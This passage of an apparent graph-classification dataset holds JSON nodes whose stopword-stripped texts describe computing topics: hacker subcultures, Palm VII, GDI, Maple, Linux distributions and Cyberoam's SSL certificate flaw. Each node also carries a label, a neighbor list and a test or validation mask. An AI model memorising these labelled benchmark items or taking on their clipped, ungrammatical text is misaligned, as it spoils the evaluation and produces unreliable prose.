connotation resented many object term taken cultural jargon used negatively including historically preferred self-identify hackers many advocate using recent nuanced alternate terms describing criminals others negatively take advantage security flaws software hardware others prefer follow common popular usage arguing positive form confusing unlikely become widespread general public minority still use term senses despite controversy leaving context clarify leave ambiguous meaning intended however positive definition hacker widely used predominant form many years negative definition popularized hacker therefore seen shibboleth identifying use technically-oriented sense opposed exclusively intrusion-oriented sense members computing community hand due variety industries software designers may find many prefer referred hackers word holds negative denotation many industries possible middle ground position suggested based observation hacking describes collection skills tools used hackers descriptions differing reasons analogy made locksmithing specifically picking locks skill used good evil primary weakness analogy inclusion script kiddies popular usage hacker despite lack underlying skill knowledge base sometimes hacker simply used synonymously geek true hacker group person person loves stay night machine love-hate relationship ... 're kids tended brilliant interested conventional goals ... term derision also ultimate compliment fred shapiro thinks common theory 'hacker originally benign term malicious connotations word later perversion untrue found malicious connotations already present mit 1963 quoting tech mit student newspaper time referred unauthorized users telephone network phreaker movement developed computer security hacker subculture today hacker culture idea derived community enthusiast computer programmers systems designers 1960s around massachusetts institute technology mit tech model railroad club tmrc mit artificial intelligence laboratory concept expanded hobbyist home computing community focusing hardware late 1970s e.g homebrew computer club software video games software cracking demoscene 1980s/1990s later would go encompass many new definitions art life hacking security hackers people involved circumvention computer security among security hackers several types including white hats hackers work keep data safe hackers finding system vulnerabilities mitigated white hats usually employed target system owner typically paid sometimes quite well work work illegal done system owner consent black hats crackers hackers malicious intentions often steal exploit sell data usually motivated personal gain work usually illegal cracker like black hat hacker specifically someone skilled tries via hacking make profits benefit vandalize crackers find exploits system vulnerabilities often use advantage either selling fix system owner selling exploit black hat hackers turn use steal information gain royalties grey hats include hack fun troll may fix exploit vulnerabilities usually financial gain even malicious work still illegal done without target system owner consent grey hats usually associated black hat hackers four primary motives proposed possibilities hackers attempt break computers networks first criminal financial gain hacking systems specific purpose stealing credit card numbers manipulating banking systems second many hackers thrive increasing reputation within hacker subculture leave handles websites defaced leave evidence proof involved specific hack third corporate espionage allows companies acquire information products services stolen used leverage within marketplace fourth state-sponsored attacks provide nation states wartime intelligence collection options conducted cyberspace main basic difference programmer subculture computer security hacker mostly separate historical origin development however jargon file reports considerable overlap existed early phreaking beginning 1970s article mit student paper tech used term hacker context already 1963 pejorative meaning someone messing phone system overlap quickly started break people joined activity less responsible way case publication article exposing activities draper engressia according raymond hackers programmer subculture usually work openly use real name computer security hackers prefer secretive groups identity-concealing aliases also activities practice largely distinct former focus creating new improving existing infrastructure especially software environment work latter primarily strongly emphasize general act circumvention security measures effective use knowledge report help fixing security bugs exploitation reasons rather secondary visible difference views design mit hackers incompatible timesharing system deliberately security measures subtle overlaps however since basic knowledge computer security also common within programmer subculture hackers example ken thompson noted 1983 turing award lecture possible add code unix login command would accept either intended encrypted password particular known password allowing backdoor system latter password named invention trojan horse furthermore thompson argued c compiler could modified automatically generate rogue code make detecting modification even harder compiler program generated compiler trojan horse could also automatically installed new compiler program without detectable modification source new compiler however thompson disassociated strictly computer security hackers would like criticize press handling 'hackers 414 gang dalton gang etc acts performed kids vandalism best probably trespass theft worst ... watched kids testifying congress clear completely unaware seriousness acts programmer subculture hackers sees secondary circumvention security mechanisms legitimate done get practical barriers way actual work special forms even expression playful cleverness however systematic primary engagement activities one actual interests programmer subculture hackers significance actual activities either difference historically members programmer subculture hackers working academic institutions used computing environment contrast prototypical computer security hacker access exclusively home computer modem however since mid-1990s home computers could run unix-like operating systems inexpensive internet home access available first time many people outside academic world started take part programmer subculture hacking since mid-1980s overlaps ideas members computer security hacking community prominent case robert t. morris user mit-ai yet wrote morris worm jargon file hence calls true hacker blundered nevertheless members programmer subculture tendency look disassociate overlaps commonly refer disparagingly people computer security subculture crackers refuse accept definition hacker encompasses activities computer security hacking subculture hand tends distinguish two subcultures harshly acknowledging much common including many members political social goals love learning technology restrict use term cracker categories script kiddies black hat hackers instead three subcultures relations hardware modifications early days network hacking phreaks building blue boxes various variants programmer subculture hackers stories several hardware hacks folklore mysterious 'magic switch attached pdp-10 computer mit ai lab turned crashed computer early hobbyist hackers built home computers construction kits however activities died 1980s phone network switched digitally controlled switchboards causing network hacking shift dialing remote computers modems pre-assembled inexpensive home computers available academic institutions started give individual mass-produced workstation computers scientists instead using central timesharing system kind widespread hardware modification nowadays case modding encounter programmer computer security hacker subculture occurred end 1980s group computer security hackers sympathizing chaos computer club disclaimed knowledge activities broke computers american military organizations academic institutions sold data machines soviet secret service one order fund drug addiction case solved clifford stoll scientist working system administrator found ways log attacks trace back help many others 23 german film adaption fictional elements shows events attackers perspective stoll described case book cuckoo egg tv documentary kgb computer perspective according eric s. raymond nicely illustrates difference 'hacker 'cracker stoll portrait lady martha friends berkeley internet paints marvelously vivid picture hackers people around like live think",
    "neighbors": [
      1024,
      5636,
      10756,
      535,
      9761,
      4644,
      4133,
      7739,
      1608,
      3657,
      6728,
      8779,
      11358,
      4703,
      8288,
      2147,
      8292,
      8807,
      6262,
      3704,
      1147,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      7829,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      6842,
      7872,
      3789,
      4304,
      6352,
      4314,
      9435,
      3807,
      1249,
      1251,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      3336,
      3852,
      8974,
      10003,
      3880,
      8489,
      9000,
      11052,
      9518,
      1861,
      331,
      6484,
      857,
      1882,
      4956,
      9052,
      3944,
      4460,
      8045,
      6513,
      3956,
      6520,
      9082,
      11152,
      3473,
      10132,
      6047,
      1440,
      1952,
      5024,
      11175,
      5547,
      1970,
      8632,
      441,
      1979,
      4027,
      8635,
      7619,
      4054,
      5087,
      1504,
      9186,
      2542,
      507,
      2558,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 4831,
    "label": 2,
    "text": "Michael_Kerrisk:michael kerrisk michael kerrisk technical author programmer since 2004 maintainer linux man-pages project succeeding andries brouwer born 1961 new zealand lives munich germany kerrisk worked digital equipment google linux foundation editor writer lwn.net currently works freelance consultant trainer best known book linux programming interface published starch press 2010 book widely regarded definitive work linux system programming translated several languages maintainer linux man-pages project kerrisk authored co-authored third man pages worked improving project infrastructure contributions received special award 2016 new zealand open source awards",
    "neighbors": [
      1026,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      6691,
      6180,
      8242,
      9266,
      2109,
      6213,
      10822,
      8263,
      8268,
      589,
      4177,
      8787,
      5222,
      10856,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      1694,
      6302,
      8354,
      2723,
      8364,
      1717,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      6352,
      3802,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      4367,
      792,
      7450,
      10016,
      802,
      6947,
      5410,
      295,
      5931,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      7540,
      11643,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      10687,
      457,
      9696,
      2529,
      6625,
      11232,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 4832,
    "label": 3,
    "text": "Palm_VII:palm vii palm vii personal digital assistant made palm computing division 3com device featured antenna used wireless data communication first palm device connectivity provided mobitex network defunct palm.net service web clipping applications also known palm query applications pqas made use network request post web data devices also provided pqa developers user position form zipcode making palm vii first web-enabled location-based services mobile platform cost service 14.95 per month allowed limited number web pages viewed palm vii expensive palm sold date unit pricing starting us 599 despite high price tag palm vii proved popular one first truly wireless data-capable information devices",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      11337,
      9037,
      2258,
      1621,
      4449,
      2285,
      1776,
      2420,
      8952,
      9598
    ],
    "mask": "Test"
  },
  {
    "node_id": 4833,
    "label": 3,
    "text": "AMULET_microprocessor:amulet microprocessor amulet series microprocessors implementing arm processor architecture developed advanced processor technologies group school computer science university manchester formerly amulet pal groups based institution amulet unique amongst arm implementations asynchronous microprocessor making use square wave clock signal data synchronization movement",
    "neighbors": [
      1376,
      1776,
      8523,
      9964
    ],
    "mask": "Test"
  },
  {
    "node_id": 4834,
    "label": 4,
    "text": "SIFT_Workstation_-_Digital_Forensics_and_Incident_Response_Distribution:sift workstation digital forensics incident response distribution sift computer forensics distribution installs necessary tools ubuntu perform detailed digital forensic incident response examination compatible expert witness format e01 advanced forensic format aff raw dd memory analysis evidence formats toolkit ability securely examine raw disks multiple file systems evidence formats places strict guidelines evidence examined read-only verifying evidence changed",
    "neighbors": [
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      11182,
      7983,
      10290,
      4789,
      8635,
      830,
      2494,
      3393,
      7369,
      842,
      6475,
      10189,
      4049,
      5475,
      7525,
      9319,
      7160,
      11642
    ],
    "mask": "None"
  },
  {
    "node_id": 4835,
    "label": 9,
    "text": "P_(programming_language):p programming language p programming language developed microsoft uc berkeley p enables programmers specify systems consisting collection state machines communicate asynchronously terms events code run microsoft windows windows phone open source",
    "neighbors": [
      5612,
      6797,
      8262,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 4836,
    "label": 2,
    "text": "Graphics_Device_Interface:graphics device interface graphics device interface gdi microsoft windows application programming interface core operating system component responsible representing graphical objects transmitting output devices monitors printers gdi responsible tasks drawing lines curves rendering fonts handling palettes directly responsible drawing windows menus etc task reserved user subsystem resides user32.dll built atop gdi systems components similar gdi example macos quartz x window system xlib/xcb gdi significant advantages direct methods accessing hardware perhaps scaling capabilities abstract representation target devices using gdi easy draw multiple devices screen printer expect proper reproduction case capability center see get applications microsoft windows simple games require fast graphics rendering may use gdi however gdi relatively hard use advanced animation lacks notion synchronizing individual video frames video card lacks hardware rasterization 3d etc modern games usually use directx opengl instead let programmers exploit features modern hardware device context dc used define attributes text images output screen printer actual context maintained gdi handle device context hdc obtained output written released elements written gdi uses bresenham line drawing algorithm draw aliased lines gdi present initial release windows ms-dos programs hitherto manipulated graphics hardware using software interrupts sometimes via video bios manipulating video memory directly code written way expects user video memory tenable windowed system like microsoft windows multiple applications would want write subwindows concurrently byte december 1983 discussed microsoft plans system output graphics printers monitors code forthcoming first release windows introduction windows xp gdi complemented c++-based gdi+ subsystem gdi+ adds anti-aliased 2d graphics floating point coordinates gradient shading complex path management intrinsic support modern graphics-file formats like jpeg png support composition affine transformations 2d view pipeline gdi+ uses argb values represent color use features apparent windows xp user interface several applications microsoft paint windows picture fax viewer photo printing wizard pictures slideshow screensaver presence basic graphics layer greatly simplifies implementations vector-graphics systems flash svg gdi+ included versions windows windows xp gdi+ dynamic library also shipped application used older versions windows windows 98 windows nt 4.0 onwards additional text processing resolution independence capabilities gdi+ text rendering performed cpu nearly order magnitude slower hardware accelerated gdi chris jackson published tests indicating piece text rendering code written could render 99,000 glyphs per second gdi code using gdi+ rendered 16,600 glyphs per second microsoft .net class library provides managed interface gdi+ via codice_1 namespace gdi+ similar purpose structure apple quickdraw gx subsystem open-source libart cairo libraries windows vista windows applications including gdi gdi+ applications run new compositing engine desktop window manager dwm built atop windows display driver model gdi rendering implemented canonical display driver cdd.dll draws system memory surfaces redirected dwm gdi longer hardware-accelerated video card driver however due nature desktop composition internal management moving bitmaps transparency anti-aliasing gdi+ handled dwm core operations like window moves faster responsive underlying content need re-rendered application windows 7 includes gdi hardware acceleration blitting operations windows display driver model v1.1 improves gdi performance canonical display driver allows dwm engine use local video memory compositing thereby reducing system memory footprint increasing performance graphics operations primitive gdi operations still hardware-accelerated unlike direct2d november 2009 amd nvidia released wddm v1.1 compatible video drivers gdi+ continues rely software rendering windows 7 gdi printer winprinter analogous winmodem printer designed accept output host computer running gdi windows host computer print processing gdi software renders page bitmap sent software printer driver usually supplied printer manufacturer processing particular printer printer combination gdi driver bidirectional receive information printer whether ready print paper ink non-gdi printers require hardware firmware memory page rendering gdi printer uses host computer making cheaper manufacture similar non-gdi printer manufacturers produce essentially printer version compatible printer control language pcl postscript cheaper gdi-only version cases lowest-cost models given manufacturer range support gdi printer control language accept input device suitable driver gdi printer requires pc running windows compatible hardware operating systems general gdi printers compatible hardware print servers although servers built-in processing capability making compatible specified gdi printers gdi printers made available computers network connected shared printers computer running windows generic gdi drivers pnm2ppa written make gdi printers compatible non-windows operating systems freebsd guarantee particular gdi printer supported order allow simpler creation drivers winprinters microsoft universal printer driver created allows printer vendors write generic printer description gpd minidrivers describe printer capabilities command set plaintext rather kernel mode driver development time window opened consumes gdi objects complexity window increases additional features buttons images gdi object usage also increases many objects use windows unable draw gdi objects leading misbehaving software frozen unresponsive program operation many applications also incorrectly coded fail release gdi objects use adds problem total available gdi objects varies one version windows next windows 95 98 millennium limit 1,200 total objects windows 2000 limit 16,384 objects windows xp vista windows 7 configurable limit via registry defaults 10,000 objects per process theoretical maximum 65,536 entire session windows 8 8.1 increase gdi object limit 65,536 per user logon session earlier versions windows windows 3.1 windows 98 included resource meter program allow user monitor much total system gdi resources use unfortunately resource meter consumed gdi objects later versions windows 2000 windows xp report gdi object usage program task manager tell user total gdi capacity available overflowing gdi capacity affect windows preventing new windows opening menus displaying alert boxes appearing situation difficult clear potentially require forced hard-reset system since prevents core system programs functioning windows 8 8.1 forced logoffs occur result gdi capacity overflow instead hard reboot example forcing frozen process end using task manager normally makes sure alert window appear free gdi windows beeps error alert choice appear gdi-overflowing processes terminated unless user uses taskkill command direct2d directwrite designed replace gdi/gdi+ uniscribe respectively screen-oriented rendering shipped windows 7 windows server 2008 r2 well windows vista windows server 2008 platform update installed wpf/uwp based-application win2d gdi like class library developed microsoft downloaded inside visual studio using nuget win2d easy-to-use windows runtime api immediate mode 2d graphics rendering gpu acceleration",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      11300,
      1577,
      10281,
      2603,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      8763,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      5225,
      8301,
      622,
      9839,
      4210,
      2676,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      639,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      137,
      8841,
      651,
      1676,
      653,
      5259,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      6830,
      10414,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10480,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      1348,
      6984,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      2401,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      3974,
      5000,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      6550,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      8628,
      9655,
      6584,
      1978,
      2493,
      960,
      1474,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      8167,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 4837,
    "label": 8,
    "text": "NCSA_HTTPd:ncsa httpd ncsa httpd early discontinued web server originally developed ncsa university illinois urbana–champaign robert mccool others first released 1993 among earliest web servers developed following tim berners-lee cern httpd tony sanders plexus server others time natural counterpart mosaic web browser client–server world wide web also introduced common gateway interface allowing creation dynamic websites robert mccool left ncsa mid-1994 development ncsa httpd slowed greatly independent effort apache project took codebase continued meanwhile ncsa released one version 1.5 ceased development august 1995 ncsa httpd powered web servers internet nearly quickly switched apache april 1996 apache passed ncsa httpd 1 server internet retained position mid-to-late 2016",
    "neighbors": [
      1920,
      4485,
      4997,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      679,
      11682,
      7338,
      9387,
      44,
      11439,
      10800,
      2485,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      6379,
      9580,
      2287,
      11376,
      8691,
      10611,
      119,
      11386,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4838,
    "label": 9,
    "text": "Fifth-generation_programming_language:fifth-generation programming language fifth-generation programming language 5gl programming language based problem solving using constraints given program rather using algorithm written programmer constraint-based logic programming languages declarative languages fifth-generation languages fourth-generation programming languages designed build specific programs fifth-generation languages designed make computer solve given problem without programmer way user needs worry problems need solved conditions need met without worrying implement routine algorithm solve fifth-generation languages used mainly artificial intelligence research ops5 mercury examples fifth-generation languages types languages also built upon lisp many originating lisp machine icad many frame languages kl-one 1980s fifth-generation languages considered way future predicted would replace languages system development exception low-level languages notably 1982 1993 japan put much research money fifth-generation computer systems project hoping design massive computer network machines using tools however larger programs built flaws approach became apparent turns given set constraints defining particular problem deriving efficient algorithm solve difficult problem crucial step yet automated still requires insight human programmer vendors known occasion advertise languages 5gl time actually sell 4gls higher level automation knowledge base hype 1980s faded away projects eventually dropped 5gl awareness also dropped opened doors vendors re-use term marketing new tools without causing much controversy among current generations programmers",
    "neighbors": [
      9345,
      2691,
      9224,
      5651,
      5527,
      9626,
      3613,
      4770,
      5415,
      5680,
      305,
      9780,
      1591,
      4410,
      191,
      10819,
      8262,
      9926,
      4042,
      5845,
      477,
      7395,
      6502,
      9330,
      9331,
      2556,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 4839,
    "label": 9,
    "text": "Mitchell_Wand:mitchell wand mitchell wand computer science professor northeastern university received ph.d. massachusetts institute technology research centred programming languages member northeastern programming research lab also co-author daniel p. friedman christopher t. haynes essentials programming languages",
    "neighbors": [
      8262,
      1783,
      6767,
      10324,
      9175,
      11226
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4840,
    "label": 9,
    "text": "Maple_(software):maple software maple symbolic numeric computing environment also multi-paradigm programming language developed maplesoft maple also covers aspects technical computing including visualization data analysis matrix computation connectivity toolbox maplesim adds functionality multidomain physical modeling code generation users enter mathematics traditional mathematical notation custom user interfaces also created support numeric computations arbitrary precision well symbolic computation visualization examples symbolic computations given maple incorporates dynamically typed imperative-style programming language resembles pascal language permits variables lexical scope also interfaces languages c c fortran java matlab visual basic also interface excel maple supports mathml 2.0 w3c format representing interpreting mathematical expressions including display web pages maple based small kernel written c provides maple language functionality provided libraries come variety sources libraries written maple language viewable source code many numerical computations performed nag numerical libraries atlas libraries gmp libraries different functionality maple requires numerical data different formats symbolic expressions stored memory directed acyclic graphs standard interface calculator interface written java first concept maple arose meeting november 1980 university waterloo researchers university wished purchase computer powerful enough run macsyma instead decided would develop computer algebra system would able run lower cost computers first limited version appearing december 1980 maple demonstrated first conferences beginning 1982 name reference maple canadian heritage end 1983 50 universities copies maple installed machines 1984 research group arranged watcom products inc license distribute first commercially available version maple 3.3 1988 waterloo maple inc. founded company ’ original goal manage distribution software eventually company evolved r department maple development done today rest done university research labs worldwide including symbolic computation laboratory university waterloo ontario research centre computer algebra university western ontario 1989 first graphical user interface maple developed included version 4.3 macintosh x11 windows versions new interface followed 1990 maple v. 1992 maple v release 2 introduced maple worksheet combined text graphics input typeset output 1994 special issue newsletter created maple developers called mapletech published 1999 release maple 6 maple included nag numerical libraries 2003 current standard interface introduced maple 9 interface primarily written java although portions rules typesetting mathematical formulae written maple language java interface criticized slow improvements made later versions although maple 11 documentation recommends previous classic interface users less 500 mb physical memory mid 1995 2005 maple lost significant market share competitors due weaker user interface 2005 maple 10 introduced new document mode part standard interface developed following years september 2009 maple maplesoft acquired japanese software retailer cybernet systems features maple include sample imperative programming constructs simple functions also defined using maps arrow notation find answer compute determinant matrix series tanh x x=0,15 high order polynomial equation plot x*sin x x=-10..10 plot3d x^2+y^2 x=-1..1 y=-1..1 plots -animate subs k .5 f x=-30..30 t=-10..10 numpoints=200 frames=50 color=red thickness=3 plots -animate3d cos t*x *sin 3*t*y x=-pi..pi y=-pi..pi t=1..2 matrix 400,400,200 100,100 -400 1,1,1 datatype=float 8 plot3d 1 x=0..2*pi y=0..pi axes=none coords=spherical viewpoint= path=m f 1+a*t+b*t^2 *exp c*t find functions formula_17 satisfy integral equation maple engine used within several products maplesoft listed third-party commercial products longer use maple engine",
    "neighbors": [
      9345,
      1923,
      7301,
      3462,
      8582,
      1673,
      5129,
      7945,
      3980,
      2317,
      6797,
      15,
      6160,
      7950,
      8079,
      10510,
      11406,
      5783,
      2457,
      5148,
      7580,
      7326,
      5677,
      7341,
      9133,
      10413,
      2045,
      6962,
      823,
      10043,
      4797,
      6718,
      2242,
      963,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      8524,
      9926,
      847,
      2000,
      11219,
      3960,
      9944,
      2652,
      8440,
      10848,
      4707,
      100,
      11239,
      8554,
      363,
      5612,
      5741,
      7148,
      7924,
      3573,
      6134,
      1016,
      2939,
      2557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4841,
    "label": 2,
    "text": "Comparison_of_Linux_distributions:comparison linux distributions technical variations linux distributions include support different hardware devices systems software package configurations organizational differences may motivated historical reasons criteria include security including quickly security upgrades available ease package management number packages available tables compare notable distribution latest stable release wide-ranging objective criteria cover operating system subjective merits branches marked unstable beta compare linux distributions operating systems table shows general information distributions creator producer release date latest version etc linux distributions endorsed free software foundation marked 100 free system distribution commitment column table shows default file system many linux distributions support ext2 ext3 ext4 btrfs reiserfs reiser4 jfs xfs gfs2 ocfs2 nilfs possible install linux onto file systems ext file systems namely ext2 ext3 ext4 based original linux file system file systems developed companies meet specific needs hobbyists adapted unix microsoft windows operating systems linux full support xfs jfs fat dos file system hfs main file system macintosh support microsoft windows nt ntfs file system developed comparable native unix file systems cds dvds blu-ray discs iso 9660 universal disk format udf supported unlike operating systems linux unix allow file system regardless medium stored whether medium magnetic disk optical disk cd dvd etc usb flash memory key even contained within file located another file system similarly many c compilers mainly gnu compiler collection gcc init systems mainly sysvinit desktop environments window managers widely supported linux kernel portability instruction set architectures x86 early feature added kernel information features distributions package numbers approximate distributions like debian tend separate tools different packages usually stable release development release documentation debug also counting source package number varies debian rpm based entries base produce binary packages total number packages number binary packages arch based entries additional e.g arch linux provides 11'000 47'000 packages i.e 58'000 packages",
    "neighbors": [
      2560,
      3073,
      4611,
      3079,
      5644,
      6669,
      3089,
      4113,
      5139,
      8209,
      9237,
      8214,
      8727,
      6680,
      10780,
      4637,
      543,
      11297,
      546,
      3618,
      7204,
      9253,
      5670,
      9762,
      9257,
      11305,
      1584,
      9266,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      7234,
      10817,
      8772,
      3142,
      3654,
      5190,
      3147,
      1101,
      2125,
      1107,
      6227,
      1110,
      2134,
      89,
      3162,
      5721,
      4192,
      2658,
      10851,
      6244,
      3685,
      9320,
      6763,
      10860,
      5742,
      2671,
      1138,
      1143,
      9851,
      11388,
      1150,
      11391,
      2180,
      2692,
      7300,
      7812,
      8326,
      8837,
      9353,
      10382,
      657,
      2193,
      2194,
      2195,
      2197,
      9873,
      2199,
      11410,
      8857,
      9882,
      10394,
      6301,
      1694,
      5279,
      10397,
      673,
      3745,
      8867,
      1700,
      7332,
      7845,
      4775,
      5800,
      10920,
      9899,
      3245,
      7854,
      2224,
      2738,
      10933,
      4790,
      4279,
      11447,
      10425,
      2239,
      9407,
      4803,
      2763,
      8907,
      8909,
      3791,
      6352,
      4309,
      3289,
      3802,
      7385,
      10971,
      11481,
      10464,
      1761,
      6371,
      7913,
      6890,
      5356,
      6380,
      5358,
      1263,
      7920,
      8944,
      6898,
      9455,
      9964,
      9461,
      246,
      1782,
      5369,
      6393,
      8957,
      7938,
      4355,
      2310,
      4360,
      7435,
      8976,
      2321,
      1298,
      1813,
      6934,
      4887,
      1820,
      8992,
      5410,
      10530,
      6436,
      2853,
      5413,
      1833,
      3369,
      9004,
      815,
      304,
      2864,
      5430,
      823,
      6968,
      3387,
      3903,
      3395,
      11587,
      8005,
      2375,
      3911,
      5959,
      10063,
      4437,
      11095,
      9048,
      9564,
      3422,
      863,
      4961,
      2914,
      8033,
      5988,
      10083,
      5990,
      9064,
      10091,
      6508,
      7020,
      7534,
      11121,
      1394,
      9074,
      1396,
      5492,
      1399,
      1406,
      11648,
      3969,
      3458,
      7555,
      8066,
      390,
      11654,
      1416,
      905,
      2955,
      4493,
      10127,
      912,
      5523,
      11155,
      11669,
      10646,
      1431,
      8092,
      926,
      2974,
      7070,
      9119,
      9637,
      934,
      935,
      6055,
      10149,
      7082,
      4011,
      6062,
      1455,
      1456,
      9646,
      8114,
      11184,
      948,
      7607,
      8119,
      9660,
      10172,
      10687,
      10694,
      4039,
      4040,
      457,
      5067,
      975,
      8147,
      9689,
      2010,
      9693,
      9696,
      6625,
      1506,
      11232,
      8676,
      485,
      2021,
      9190,
      10732,
      9197,
      495,
      8177,
      499,
      1524,
      2036,
      5110,
      5620,
      8180,
      8700,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 4842,
    "label": 1,
    "text": "International_Merchant_Marine_Registry_of_Belize:international merchant marine registry belize international merchant marine registry belize immarbe body appointed government belize register ships belizean flag",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4843,
    "label": 4,
    "text": "Cyberoam:cyberoam cyberoam technologies sophos company global network security appliances provider presence 125 countries company offers user identity-based network security firewalls/ unified threat management appliances allowing visibility granular control users activities business networks soho smb large enterprise networks ensures security built around network user protection apts insider threats malware hacker sophisticated network attacks cyberoam sales offices north america emea apac company customer support development centers india 550+ employees across globe channel-centric approach sales global network 4500+ partners company also conducts training programs customers partners cyberoam ’ product range offers network security solution firewall utm appliances centralized security management cyberoam central console appliances centralized visibility cyberoam iview cyberoam netgenie home small office networks cyberoam network security appliances include multiple features like firewall – vpn ssl vpn ipsec gateway anti-virus anti-spyware anti-spam intrusion prevention system ips content application filtering web application firewall application visibility control bandwidth management multiple link management load balancing gateway failover single platform cyberoam offers visibility control 2000+ key applications offers complete visibility applications accessed within organization user irrespective ports protocols stops sophisticated application-layer threats right network perimeter ensuring application security granular controls applications ensure qos critical applications cyberoam utm ’ on-appliance reporting gives details every type attack vector attacker details victim details also graphically represents general security trends organization cyberoam solutions aid compliance regulatory needs organizations cyberoam firewall technology eal4+ certified eal4+ certification security product firewall requires in-depth evaluation independent third-party test lab globally regarded decisive measure quality security product cyberoam gsmc global iso 20000 2011 certified post sales technical services global customers cyberoam cr series utm level 5 checkmark certified cyberoam firewall certified icsa labs firewall certification icsa labs firewall certification demands required icsa labs independent division cybertrust validating cyberoam ’ firewall capabilities effectively protecting customers ’ networks malicious internet threats cyberoam ‘ ipv6 ready ’ certified identify process ipv6 traffic ipv6 ready logo program driven ipv6 forum international testing program 3000 test cases product rigorously tested cyberoam patented layer 8 technology also known identity based security adds 8th layer human layer network protocol stack thereby considering user ’ identity part firewall rule matching criteria cyberoam attaches user identity security authenticating authorizing auditing aaa network allowing network administrator see control ‘ user ’ network instead ip address enables administrators identify users control internet activity users network set user based policies reporting username cyberoam launched global mission sign academies bridge demand-supply gap network security recently called cyberoam academy order propagate knowledge identity-based technology among upcoming networking students cyberoam tied nescot north east surrey college technology -its first master uk training academy nescot offers cyberoam certified security courses includes basic-level course namely 'ccnsp cyberoam certified security professional advanced-level course namely 'ccnse cyberoam certified security expert cyberoam threat research labs ctrl identifies security threats eventually raising resistance various vulnerabilities malware attacks publishing security upgrades research reports reports help users remain protected detailed guidance malware threat prevention advice using appropriate configuration parameters cyberoam appliances ctrl goes beyond finding emerging potential threats aims providing insightful investigation advanced threats engineered imagined around today ’ internet usage apps tor project researcher google software security engineer revealed july 2012 cyberoam appliances ssl traffic inspection capabilities using self-generated ca certificate default made possible intercept traffic victim cyberoam device cyberoam device indeed extract key device import dpi deep packet inspection devices use interception cyberoam issued over-the-air ota update unified threat management utm appliances order force devices use unique certificate authority ca ssl certificates intercepting ssl traffic corporate networks hotfix applied individual appliance required unique ca certificate",
    "neighbors": [
      2213,
      2118,
      8998,
      1961,
      6762,
      939,
      3885,
      10417,
      3125,
      5404,
      8343,
      10392,
      1433,
      7515,
      4956,
      2558,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 4844,
    "label": 9,
